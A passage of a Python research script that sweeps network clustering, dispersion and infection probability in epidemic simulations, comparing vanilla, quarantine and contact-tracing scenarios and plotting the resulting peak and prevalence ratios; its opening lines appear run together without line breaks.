# return value should use one of the values t_peak, peak_height, equilib_flag, period_prevalence peak_times = np.ndarray(res) peak_heights = np.ndarray(res) peak_heights_sd = np.ndarray(res) # flags = np.ndarray(res) period_prevalences = np.ndarray(res) period_prevalences_sd = np.ndarray(res) p_is = np.linspace(0, 1, endpoint=True, num=res) for i, p_inf in enumerate(p_is): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=seed + i, mode=mode, force_recompute=force_recompute, path=path) # TODO seed inside simple_experiment is constant, think about whether that's ok! peak_times[i] = t_peak peak_heights[i] = mean_peak peak_heights_sd[i] = sd_peak period_prevalences[i] = mean_prevalence period_prevalences_sd[i] = sd_prevalence fig, axes = plt.subplots(3, 1, sharex=True, figsize=(16 * 1.5, 9 * 1.5)) # fig.subplots_adjust(wspace = 0.5) ax1, ax2, ax3 = axes ax1.plot(p_is, peak_times) # ax1.set_xlabel('p') ax1.set_ylabel('peak-times') ax2.plot(p_is, peak_heights) # ax2.set_xlabel('p') ax2.set_ylabel('peak-height') ax3.plot(p_is, period_prevalences) # ax3.set_xlabel('p') ax3.set_ylabel('percentage of affected') ax3.set_xlabel('infection probability') ax3.set_xticks(p_is) # plt.show() if mode: fig.savefig(os.path.join(path, 'pivaried_n{}_p{}_{}'.format(n, p, mode) + '.png')) else: fig.savefig(os.path.join(path, 'pivaried_n{}_p{}'.format(n, p) + '.png')) def vary_C(res, n, p, p_i, mc_iterations, max_t, interval=None, seed=0, mode=None, force_recompute=False, path=None): # measure effect of clustering coeff on tracing effectiveness if not interval: # THEORY: the average clustering coeff of erdos renyi networks is p! 
# so I test around that to see what changed interval = (0.5 * p, 10 * p) peak_times = np.ndarray(res) peak_heights = np.ndarray(res) peak_heights_sd = np.ndarray(res) period_prevalences = np.ndarray(res) period_prevalences_sd = np.ndarray(res) Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res) unsuccessful_flag = [] for i, C in tqdm(enumerate(Cs), total=res): try: net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode=mode, force_recompute=force_recompute, path=path, clustering=C) peak_times[i] = t_peak peak_heights[i] = mean_peak peak_heights_sd[i] = sd_peak period_prevalences[i] = mean_prevalence period_prevalences_sd[i] = sd_prevalence # Cs[i] = net.final_cluster_coeff # in the end I want to plot the actual coeff, not the target # should specify this in the paper except AssertionError: print('Clustering target not reached') unsuccessful_flag.append(i) peak_times[i] = np.nan peak_heights[i] = np.nan peak_heights_sd[i] = np.nan period_prevalences[i] = np.nan period_prevalences_sd[i] = np.nan dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache') id_params = ( n, p, p_i, mc_iterations, max_t, seed, mode, interval, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, epsilon_disp, 'disp') # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) with open(os.path.join(dirname, tag + '_metrics.p'), 'wb') as f: out = [Cs, unsuccessful_flag, peak_times, peak_heights, period_prevalences] pickle.dump(out, f) fig, axes = plt.subplots(3, 1, sharex=True, figsize=(14, 14 / 16 * 9)) # fig.subplots_adjust(wspace = 0.5) ax1, ax2, ax3 = axes colordict = {'vanilla': 'C0', 'quarantine': 'C1', 'tracing': 'C2'} if mode: ax1.set_title(mode) else: ax1.set_title('Vanilla') ax1.plot(Cs, peak_times, colordict[mode]) ax1.set_ylabel('Peak time') ax2.plot(Cs, peak_heights, colordict[mode]) ax2.set_ylabel('Peak prevalence') ax3.plot(Cs, period_prevalences, colordict[mode]) ax3.set_ylabel('Fraction of affected') ax3.set_xlabel('C(g)') # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] ax3.set_xticks(Cs[1:-1], minor=True) ax3.set_xticks([interval[0], interval[1]]) # plt.tick_params( # axis='x', # changes apply to the x-axis # which='minor', # both major and minor ticks are affected # # bottom=False, # ticks along the bottom edge are off # # top=False, # ticks along the top edge are off # labelbottom=False) # labels along the bottom edge are off # plt.xticks([interval[0],interval[1]]) if mode: parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_p{}_{}'.format( n, str(interval[0]) + 'to' + str(interval[1]), mode) + '.png'), bbox_inches='tight') else: parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight') return out # Cs, unsuccessful_flags, times, peaks, period_prev def vary_disp(res, n, p, p_i, mc_iterations, max_t, interval=None, seed=0, mode=None, force_recompute=False, path=None): # measure effect of clustering coeff on tracing effectiveness if not interval: # THEORY: the average clustering coeff of erdos renyi networks is p! 
        # so I test around that to see what changed
        interval = (0.5 * p, 10 * p)

    peak_times = np.ndarray(res)
    peak_heights = np.ndarray(res)
    peak_heights_sd = np.ndarray(res)
    period_prevalences = np.ndarray(res)
    period_prevalences_sd = np.ndarray(res)

    Ds = np.linspace(interval[0], interval[1], endpoint=True, num=res)
    unsuccessful_flag = []
    for i, D in tqdm(enumerate(Ds), total=res, desc='Varying dispersion values'):
        try:
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode=mode,
                                  force_recompute=force_recompute, path=path, dispersion=D)
            peak_times[i] = t_peak
            peak_heights[i] = mean_peak
            peak_heights_sd[i] = sd_peak
            period_prevalences[i] = mean_prevalence
            period_prevalences_sd[i] = sd_prevalence
            print('last_disp={}, target_disp={}'.format(net.final_dispersion, D))
            # Cs[i] = net.final_cluster_coeff
            # in the end I want to plot the actual coeff, not the target; should specify this in the paper
        except AssertionError:
            print('Dispersion target not reached')
            unsuccessful_flag.append(i)
            peak_times[i] = np.nan
            peak_heights[i] = np.nan
            peak_heights_sd[i] = np.nan
            period_prevalences[i] = np.nan
            period_prevalences_sd[i] = np.nan

    dirname_parent = os.path.dirname(__file__)
    dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache')

    id_params = (n, p, p_i, mc_iterations, max_t, mode, seed, interval, t_i, t_c, t_r, t_d, t_t, p_q, p_t,
                 quarantine_time, resolution, epsilon_disp)
    # normal hashes are salted between runs -> use something that is persistent
    tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest())

    with open(os.path.join(dirname, tag + '_metrics.p'), 'wb') as f:
        out = [Ds, unsuccessful_flag, peak_times, peak_heights, period_prevalences]
        pickle.dump(out, f)

    fig, axes = plt.subplots(3, 1, sharex=True, figsize=(14, 14 / 16 * 9))
    # fig.subplots_adjust(wspace = 0.5)
    ax1, ax2, ax3 = axes

    colordict = {'vanilla': 'C0', 'quarantine': 'C1', 'tracing': 'C2'}
    if mode:
        ax1.set_title(mode)
    else:
        ax1.set_title('Vanilla')
    color = colordict[mode] if mode else colordict['vanilla']  # avoid KeyError for mode=None

    ax1.plot(Ds, peak_times, color)
    ax1.set_ylabel('Peak time')
    ax2.plot(Ds, peak_heights, color)
    ax2.set_ylabel('Peak prevalence')
    ax3.plot(Ds, period_prevalences, color)
    ax3.set_ylabel('Fraction of affected')
    ax3.set_xlabel('D(g)')  # the x-axis is the dispersion coefficient here, not C(g)
    # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],]
    ax3.set_xticks(Ds[1:-1], minor=True)
    ax3.set_xticks([interval[0], interval[1]])

    parent = os.path.dirname(path)
    if mode:
        fig.savefig(os.path.join(parent, 'Pics', 'dispvaried_n{}_p{}_{}'.format(
            n, str(interval[0]) + 'to' + str(interval[1]), mode) + '.png'), bbox_inches='tight')
    else:
        fig.savefig(os.path.join(parent, 'Pics', 'dispvaried_n{}_C{}'.format(
            n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight')

    return out  # Ds, unsuccessful_flags, times, peaks, period_prev


def vary_C_comp(res, n, p, p_i, mc_iterations, max_t, interval=None, seed=0, force_recompute=False, path=None):
    # measure effect of clustering coeff on tracing effectiveness
    if not interval:
        # THEORY: the average clustering coeff of erdos renyi networks is p!
        # so I test around that to see what changed
        interval = (0.5 * p, 10 * p)

    Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res)

    # vanilla
    peak_times_1 = np.ndarray(res)
    peak_heights_1 = np.ndarray(res)
    peak_heights_sd_1 = np.ndarray(res)
    period_prevalences_1 = np.ndarray(res)
    period_prevalences_sd_1 = np.ndarray(res)
    unsuccessful_flags_1 = []
    for i, C in tqdm(enumerate(Cs), total=res, desc='Vanilla'):
        try:
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode='vanilla',
                                  force_recompute=force_recompute, path=path, clustering=C)
            peak_times_1[i] = t_peak
            peak_heights_1[i] = mean_peak
            peak_heights_sd_1[i] = sd_peak
            period_prevalences_1[i] = mean_prevalence
            period_prevalences_sd_1[i] = sd_prevalence
        except AssertionError:
            print('Clustering target not reached')
            unsuccessful_flags_1.append(i)
            peak_times_1[i] = np.nan
            peak_heights_1[i] = np.nan
            peak_heights_sd_1[i] = np.nan
            period_prevalences_1[i] = np.nan
            period_prevalences_sd_1[i] = np.nan

    # quarantine
    peak_times_2 = np.ndarray(res)
    peak_heights_2 = np.ndarray(res)
    peak_heights_sd_2 = np.ndarray(res)
    period_prevalences_2 = np.ndarray(res)
    period_prevalences_sd_2 = np.ndarray(res)
    unsuccessful_flags_2 = []
    for i, C in tqdm(enumerate(Cs), total=res, desc='Quarantine'):
        try:
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + res, mode='quarantine',
                                  force_recompute=force_recompute, path=path, clustering=C)
            peak_times_2[i] = t_peak
            peak_heights_2[i] = mean_peak
            peak_heights_sd_2[i] = sd_peak
            period_prevalences_2[i] = mean_prevalence
            period_prevalences_sd_2[i] = sd_prevalence
        except AssertionError:
            print('Clustering target not reached')
            unsuccessful_flags_2.append(i)
            peak_times_2[i] = np.nan
            peak_heights_2[i] = np.nan
            peak_heights_sd_2[i] = np.nan
            period_prevalences_2[i] = np.nan
            period_prevalences_sd_2[i] = np.nan

    # tracing
    peak_times_3 = np.ndarray(res)
    peak_heights_3 = np.ndarray(res)
    peak_heights_sd_3 = np.ndarray(res)
    period_prevalences_3 = np.ndarray(res)
    period_prevalences_sd_3 = np.ndarray(res)
    unsuccessful_flags_3 = []
    for i, C in tqdm(enumerate(Cs), total=res, desc='Tracing'):
        try:
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + 2 * res, mode='tracing',
                                  force_recompute=force_recompute, path=path, clustering=C)
            peak_times_3[i] = t_peak
            peak_heights_3[i] = mean_peak
            peak_heights_sd_3[i] = sd_peak
            period_prevalences_3[i] = mean_prevalence
            period_prevalences_sd_3[i] = sd_prevalence
        except AssertionError:
            print('Clustering target not reached')
            unsuccessful_flags_3.append(i)
            peak_times_3[i] = np.nan
            peak_heights_3[i] = np.nan
            peak_heights_sd_3[i] = np.nan
            period_prevalences_3[i] = np.nan
            period_prevalences_sd_3[i] = np.nan

    dirname_parent = os.path.dirname(__file__)
    dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache')

    id_params = (n, p, p_i, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t,
                 quarantine_time, resolution, epsilon_clustering)
    # normal hashes are salted between runs -> use something that is persistent
    tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest())

    with open(os.path.join(dirname, tag + '_metrics.p'), 'wb') as f:
        out = [Cs, unsuccessful_flags_1, peak_times_1, peak_heights_1, period_prevalences_1,
               Cs, unsuccessful_flags_2, peak_times_2, peak_heights_2, period_prevalences_2,
               Cs, unsuccessful_flags_3, peak_times_3, peak_heights_3, period_prevalences_3]
        pickle.dump(out, f)

    fig, axes = plt.subplots(3, 1, sharex=True, figsize=(14, 14 / 16 * 9))
    # fig.subplots_adjust(wspace = 0.5)
    ax1, ax2, ax3 = axes

    ax1.plot(Cs, peak_times_1, Cs, peak_times_2, Cs, peak_times_3)
    ax1.set_ylabel('Peak time')
    ax2.plot(Cs, peak_heights_1, Cs, peak_heights_2, Cs, peak_heights_3)
    ax2.set_ylabel('Peak prevalence')
    ax3.plot(Cs, period_prevalences_1, Cs, period_prevalences_2, Cs, period_prevalences_3)
    ax3.set_ylabel('Fraction of affected')
    ax3.set_xlabel('C(g)')
    # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],]
    ax3.set_xticks(Cs[1:-1], minor=True)
    ax3.set_xticks([interval[0], interval[1]])

    plt.legend(['Vanilla', 'Quarantine', 'Tracing'])

    parent = os.path.dirname(path)
    fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp'.format(
        n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight')

    return out  # Cs, unsuccessful_flags, times, peaks, period_prev


# OLD, now this is in vary_C_pi_comp_corrected
# def vary_C_comp_corrected(res, n, p, p_i, mc_iterations, max_t, interval=None, seed=0, force_recompute=False,
#                           path=None):
#     # BROKEN! Since martin's commit?
#
#     # measure effect of clustering coeff on tracing effectiveness. Here we scale according to the vanilla outcome
#
#     if not interval:
#         # THEORY: the average clustering coeff of erdos renyi networks is p!
#         # so I test around that to see what changed
#         interval = (0.5 * p, 10 * p)
#
#     Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res)
#
#     # the following two variables save the actual values that were achieved by the heuristic.
#     # In theory, these should be approximately the same in each net
#     achieved_clusterings = np.zeros((3, res))
#     achieved_disps = np.zeros((3, res))
#
#     # vanilla
#     peak_times_1 = np.ndarray(res)
#     peak_heights_1 = np.ndarray(res)
#     peak_heights_sd_1 = np.ndarray(res)
#     period_prevalences_1 = np.ndarray(res)
#     period_prevalences_sd_1 = np.ndarray(res)
#     unsuccessful_flags_1 = []
#     for i, C in tqdm(enumerate(Cs), total=res, desc='Vanilla'):
#         net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
#             simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode='vanilla',
#                               force_recompute=force_recompute,
#                               path=path, clustering=C)
#         # assert equilib_flag, 'Sim not complete?'
#
#         peak_times_1[i] = t_peak
#         peak_heights_1[i] = mean_peak
#         peak_heights_sd_1[i] = sd_peak
#         period_prevalences_1[i] = mean_prevalence
#         period_prevalences_sd_1[i] = sd_prevalence
#
#         achieved_clusterings[0, i] = achieved_clustering
#         achieved_disps[0, i] = achieved_disp
#
#         # exposed = counts[EXP_STATE, :]
#         # infected = counts[INF_STATE, :]
#         # ep_curve = exposed + infected
#
#         # exposed_sd = sd[EXP_STATE, :]
#         # infected_sd = sd[INF_STATE, :]
#         # ep_curve_sd = exposed_sd + infected_sd
#
#         # these are the point prevalence +- sd
#         # upper_alpha = (ep_curve[t_peak] + ep_curve_sd[t_peak])/n
#         # lower_alpha = (ep_curve[t_peak] - ep_curve_sd[t_peak])/n
#
#         # recovered = counts[REC_STATE, :]
#         # recovered_sd = sd[REC_STATE, :]
#
#         # upper_beta = recovered[-1]-recovered_sd/n
#
#     # quarantine
#     peak_times_2 = np.ndarray(res)
#     peak_heights_2 = np.ndarray(res)
#     peak_heights_sd_2 = np.ndarray(res)
#     period_prevalences_2 = np.ndarray(res)
#     period_prevalences_sd_2 = np.ndarray(res)
#     unsuccessful_flags_2 = []
#     for i, C in tqdm(enumerate(Cs), total=res, desc='Quarantine'):
#         net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
#             simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + res, mode='quarantine',
#                               force_recompute=force_recompute,
#                               path=path, clustering=C)
#         # assert equilib_flag, 'Sim not complete?'
#
#         peak_times_2[i] = t_peak
#         peak_heights_2[i] = mean_peak / peak_heights_1[i]
#         peak_heights_sd_2[i] = sd_peak
#         period_prevalences_2[i] = mean_prevalence / period_prevalences_1[i]
#         period_prevalences_sd_2[i] = sd_prevalence
#
#         achieved_clusterings[1, i] = achieved_clustering
#         achieved_disps[1, i] = achieved_disp
#
#     # tracing
#     peak_times_3 = np.ndarray(res)
#     peak_heights_3 = np.ndarray(res)
#     peak_heights_sd_3 = np.ndarray(res)
#     period_prevalences_3 = np.ndarray(res)
#     period_prevalences_sd_3 = np.ndarray(res)
#     unsuccessful_flags_3 = []
#     for i, C in tqdm(enumerate(Cs), total=res, desc='Tracing'):
#         net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
#             simple_experiment(n, p, p_i, 2 * mc_iterations, max_t, seed=seed + i + 2 * res, mode='tracing',
#                               force_recompute=force_recompute,
#                               path=path, clustering=C)
#         # assert equilib_flag, 'Sim not complete?'
#
#         peak_times_3[i] = t_peak
#         peak_heights_3[i] = mean_peak / peak_heights_1[i]
#         peak_heights_sd_3[i] = sd_peak
#         period_prevalences_3[i] = mean_prevalence / period_prevalences_1[i]
#         period_prevalences_sd_3[i] = sd_prevalence  # fixed typo: was period_prevalences_3_sd_2[i] = sd_prevalencea
#
#         achieved_clusterings[2, i] = achieved_clustering
#         achieved_disps[2, i] = achieved_disp
#
#     dirname_parent = os.path.dirname(__file__)
#     dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache')
#
#     id_params = (n, p, p_i, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t,
#                  quarantine_time, resolution, epsilon_clustering)
#     # normal hashes are salted between runs -> use something that is persistent
#     tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest())
#
#     with open(os.path.join(dirname, tag + '_metrics_corrected.p'), 'wb') as f:
#         out = [Cs, unsuccessful_flags_1, peak_times_1, peak_heights_1, period_prevalences_1,
#                Cs, unsuccessful_flags_2, peak_times_2, peak_heights_2, period_prevalences_2,
#                Cs, unsuccessful_flags_3, peak_times_3, peak_heights_3, period_prevalences_3,
#                achieved_clusterings, achieved_disps]
#         pickle.dump(out, f)
#
#     # two modes for visualization
#     show_both = False
#     if show_both:
#         fig, axes = plt.subplots(2, 1, sharex=True, figsize=(14, 14 / 16 * 9))
#         ax2, ax3 = axes
#
#         # ax1.plot(Cs, peak_times_1, Cs, peak_times_2, Cs, peak_times_3)
#         # ax1.set_ylabel('Peak time')
#
#         ax2.plot(Cs, peak_heights_2, 'C1')
#         ax2.plot(Cs, peak_heights_3, 'C2')
#         ax2.set_ylabel('Scaled peak height')
#
#         ax3.plot(Cs, period_prevalences_2, 'C1')
#         ax3.plot(Cs, period_prevalences_3, 'C2')
#         ax3.set_ylabel('Scaled period prevalence')
#         ax3.set_xlabel('C(g)')
#         ax3.set_xticks(Cs, minor=False)
#         ax3.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))
#         # ax3.set_xticks([interval[0], interval[1]])
#
#         # upper axis for dispersion values
#         ax_upper_axis = ax2.twiny()
#         ax_upper_axis.set_xlim(ax3.get_xlim())
#         ax_upper_axis.set_xticks(Cs)
#         ax_upper_axis.set_xticklabels(["{:.3f}".format(a) for a in achieved_disps.mean(axis=0)])
#         # ax_upper_axis.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))
#         ax_upper_axis.set_xlabel('D(g)')
#
#         # plt.xticks([interval[0],interval[1]])
#         ax3.legend(['Quarantine', 'Tracing'])
#
#         parent = os.path.dirname(path)
#         fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp_corrected'.format(
#             n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight')
#     else:
#         fig, axes = plt.subplots(2, 1, sharex=True, figsize=(14, 14 / 16 * 9))
#         ax2, ax3 = axes
#
#         ax2.plot(Cs, peak_heights_3, 'C2')
#         ax2.set_ylabel('Scaled peak height')
#
#         ax3.plot(Cs, period_prevalences_3, 'C2')
#         ax3.set_ylabel('Scaled period prevalence')
#         ax3.set_xlabel('C(g)')
#         ax3.set_xticks(Cs, minor=False)
#         ax3.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))
#
#         ax_upper_axis = ax2.twiny()
#         ax_upper_axis.set_xlim(ax3.get_xlim())
#         ax_upper_axis.set_xticks(Cs)
#         ax_upper_axis.set_xticklabels(["{:.3f}".format(a) for a in achieved_disps.mean(axis=0)])
#         # ax_upper_axis.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))
#         ax_upper_axis.set_xlabel('D(g)')
#
#         # plt.legend(['Quarantine', 'Tracing'])
#         ax3.legend(['Tracing', ])
#
#         parent = os.path.dirname(path)
#         fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}_comp_corrected_tracing'.format(
#             n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight')
#
#     return out


def vary_C_pi_comp_corrected(res, n, p, p_is: tuple, mc_iterations, max_t, interval=None, seed=0,
                             force_recompute=False, path=None):
    # measure effect of clustering coeff on tracing effectiveness. Here we scale according to the vanilla outcome
    # Several values for the infectivity p_i are used

    Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res)
    n_p_i = len(p_is)
    assert n_p_i <= 5, 'Fewer values for p_i should be selected for visibility'

    # the following two variables save the actual values that were achieved by the heuristic.
    # In theory, these should be approximately the same in each net
    achieved_clusterings = np.zeros((3 * n_p_i, res))
    achieved_disps = np.zeros((3 * n_p_i, res))

    # vanilla
    peak_times_1 = np.ndarray((res, n_p_i))
    peak_heights_1 = np.ndarray((res, n_p_i))
    peak_heights_sd_1 = np.ndarray((res, n_p_i))
    period_prevalences_1 = np.ndarray((res, n_p_i))
    period_prevalences_sd_1 = np.ndarray((res, n_p_i))
    for i, C in tqdm(enumerate(Cs), total=res, desc='Vanilla'):
        for j, p_inf in enumerate(p_is):
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 156484 + seed + i, mode='vanilla',
                                  force_recompute=force_recompute, path=path, clustering=C)
            assert equilib_flag, 'Sim not complete?'

            peak_times_1[i, j] = t_peak
            peak_heights_1[i, j] = mean_peak
            peak_heights_sd_1[i, j] = sd_peak
            period_prevalences_1[i, j] = mean_prevalence
            period_prevalences_sd_1[i, j] = sd_prevalence

            achieved_clusterings[j, i] = achieved_clustering
            achieved_disps[j, i] = achieved_disp

    # quarantine
    peak_times_2 = np.ndarray((res, n_p_i))
    peak_heights_2 = np.ndarray((res, n_p_i))
    peak_heights_sd_2 = np.ndarray((res, n_p_i))
    period_prevalences_2 = np.ndarray((res, n_p_i))
    period_prevalences_sd_2 = np.ndarray((res, n_p_i))
    for i, C in tqdm(enumerate(Cs), total=res, desc='Quarantine'):
        for j, p_inf in enumerate(p_is):
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 84265 + seed + i + res,
                                  mode='quarantine', force_recompute=force_recompute, path=path, clustering=C)
            assert equilib_flag, 'Sim not complete?'
            peak_times_2[i, j] = t_peak
            peak_heights_2[i, j] = mean_peak
            peak_heights_sd_2[i, j] = sd_peak
            period_prevalences_2[i, j] = mean_prevalence
            period_prevalences_sd_2[i, j] = sd_prevalence

            achieved_clusterings[n_p_i + j, i] = achieved_clustering
            achieved_disps[n_p_i + j, i] = achieved_disp

    # tracing
    peak_times_3 = np.ndarray((res, n_p_i))
    peak_heights_3 = np.ndarray((res, n_p_i))
    peak_heights_sd_3 = np.ndarray((res, n_p_i))
    period_prevalences_3 = np.ndarray((res, n_p_i))
    period_prevalences_sd_3 = np.ndarray((res, n_p_i))
    for i, C in tqdm(enumerate(Cs), total=res, desc='Tracing'):
        for j, p_inf in enumerate(p_is):
            net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \
                simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=j * 543513 + seed + i + 2 * res,
                                  mode='tracing', force_recompute=force_recompute, path=path, clustering=C)
            assert equilib_flag, 'Sim not complete?'

            peak_times_3[i, j] = t_peak
            peak_heights_3[i, j] = mean_peak
            peak_heights_sd_3[i, j] = sd_peak
            period_prevalences_3[i, j] = mean_prevalence
            period_prevalences_sd_3[i, j] = sd_prevalence

            achieved_clusterings[2 * n_p_i + j, i] = achieved_clustering
            achieved_disps[2 * n_p_i + j, i] = achieved_disp

    dirname_parent = os.path.dirname(__file__)
    dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache')

    id_params = (n, p, p_is, mc_iterations, max_t, interval, seed, t_i, t_c, t_r, t_d, t_t, p_q, p_t,
                 quarantine_time, resolution, epsilon_clustering)
    # normal hashes are salted between runs -> use something that is persistent
    tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest())

    with open(os.path.join(dirname, tag + '_metrics_corrected.p'), 'wb') as f:
        out = [Cs, peak_times_1, peak_heights_1, period_prevalences_1,
               peak_times_2, peak_heights_2, period_prevalences_2,
               peak_times_3, peak_heights_3, period_prevalences_3,
               achieved_clusterings, achieved_disps]
        pickle.dump(out, f)

    # two modes for visualization
    scale = 1
    fig, axes = plt.subplots(4, 1, figsize=(columwidth, 2 * columwidth), dpi=1000)
    # (axul, axur), (axll, axlr) = axes  # upper left, upper right, lower left, lower right
    ax1, ax2, ax3, ax4 = axes  # reordered to be 4x1

    # ax1.set_ylabel('$\\alpha_q$')
    # ax3.set_ylabel('$\\alpha_t$')
    # ax2.set_ylabel('$\\beta_q$')
    # ax4.set_ylabel('$\\beta_t$')
    ax1.set_ylabel('peak ratio ($\\alpha$)')
    ax3.set_ylabel('peak ratio ($\\alpha$)')
    ax2.set_ylabel('overall ratio ($\\beta$)')
    ax4.set_ylabel('overall ratio ($\\beta$)')

    ax1.set_ylim([0, 1])
    ax2.set_ylim([0, 1])
    ax3.set_ylim([0, 1])
    ax4.set_ylim([0, 1])

    # ax1.set_ylabel('Scaled peak height')
    # ax3.set_ylabel('Scaled peak height')
    # ax2.set_ylabel('Scaled period prevalence')
    # ax4.set_ylabel('Scaled period prevalence')

    # ax2.set_xlabel('C(g)')
    ax4.set_xlabel('C(g)')

    # axll.set_xticks(Cs, minor=False)
    # axll.xaxis.set_major_formatter(FormatStrFormatter('%.2f'))
    # axlr.set_xticks(Cs, minor=False)
    # axlr.xaxis.set_major_formatter(FormatStrFormatter('%.2f'))

    # ax1.set_title('Quarantine')
    # ax3.set_title('Tracing')

    # ax1.set_prop_cycle(color=['orange','orange','orange',], linestyle=['-','--',':'])
    # ax2.set_prop_cycle(color=['orange','orange','orange',], linestyle=['-','--',':'])
    # ax3.set_prop_cycle(color=['green','green','green',], linestyle=['-','--',':'])
    # ax4.set_prop_cycle(color=['green','green','green',], linestyle=['-','--',':'])

    oranges = plt.get_cmap('Blues')  # note: despite the name, this uses the 'Blues' colormap
    greens = plt.get_cmap('Greens')
    n_colors = n_p_i
    col_vals = np.linspace(0.7, 1, n_colors)
    # one shade per p_i value; a comprehension also works for n_p_i < 5, where the original
    # hard-coded indexing up to col_vals[4] would raise an IndexError
    colors = [oranges(v) for v in col_vals] + [greens(v) for v in col_vals]
    linestyles = ['-', '--', ':', '-.', (0, (5, 10))]
    line_artists = [None, ] * 2 * n_p_i
    for i in range(n_p_i):
        linestyle = linestyles[i]
        l1 = ax1.plot(Cs, peak_heights_2[:, i] / peak_heights_1[:, i], color=colors[i], linestyle=linestyle,
                      zorder=1)
        estimateQuotientCI(ax1, Cs, peak_heights_2[:, i], peak_heights_sd_2[:, i], peak_heights_1[:, i],
                           peak_heights_sd_1[:, i], color=colors[i], mccount=mc_iterations, p=95)
        l3 = ax3.plot(Cs, peak_heights_3[:, i] / peak_heights_1[:, i], color=colors[n_p_i + i],
                      linestyle=linestyle, zorder=1)
        estimateQuotientCI(ax3, Cs, peak_heights_3[:, i], peak_heights_sd_3[:, i], peak_heights_1[:, i],
                           peak_heights_sd_1[:, i], color=colors[n_p_i + i], mccount=mc_iterations, p=95)
        l2 = ax2.plot(Cs, period_prevalences_2[:, i] / period_prevalences_1[:, i], color=colors[i],
                      linestyle=linestyle, zorder=1)
        estimateQuotientCI(ax2, Cs, period_prevalences_2[:, i], period_prevalences_sd_2[:, i],
                           period_prevalences_1[:, i], period_prevalences_sd_1[:, i], color=colors[i],
                           mccount=mc_iterations, p=95)
        l4 = ax4.plot(Cs, period_prevalences_3[:, i] / period_prevalences_1[:, i], color=colors[n_p_i + i],
                      linestyle=linestyle, zorder=1)
        estimateQuotientCI(ax4, Cs, period_prevalences_3[:, i], period_prevalences_sd_3[:, i],
                           period_prevalences_1[:, i], period_prevalences_sd_1[:, i], color=colors[n_p_i + i],
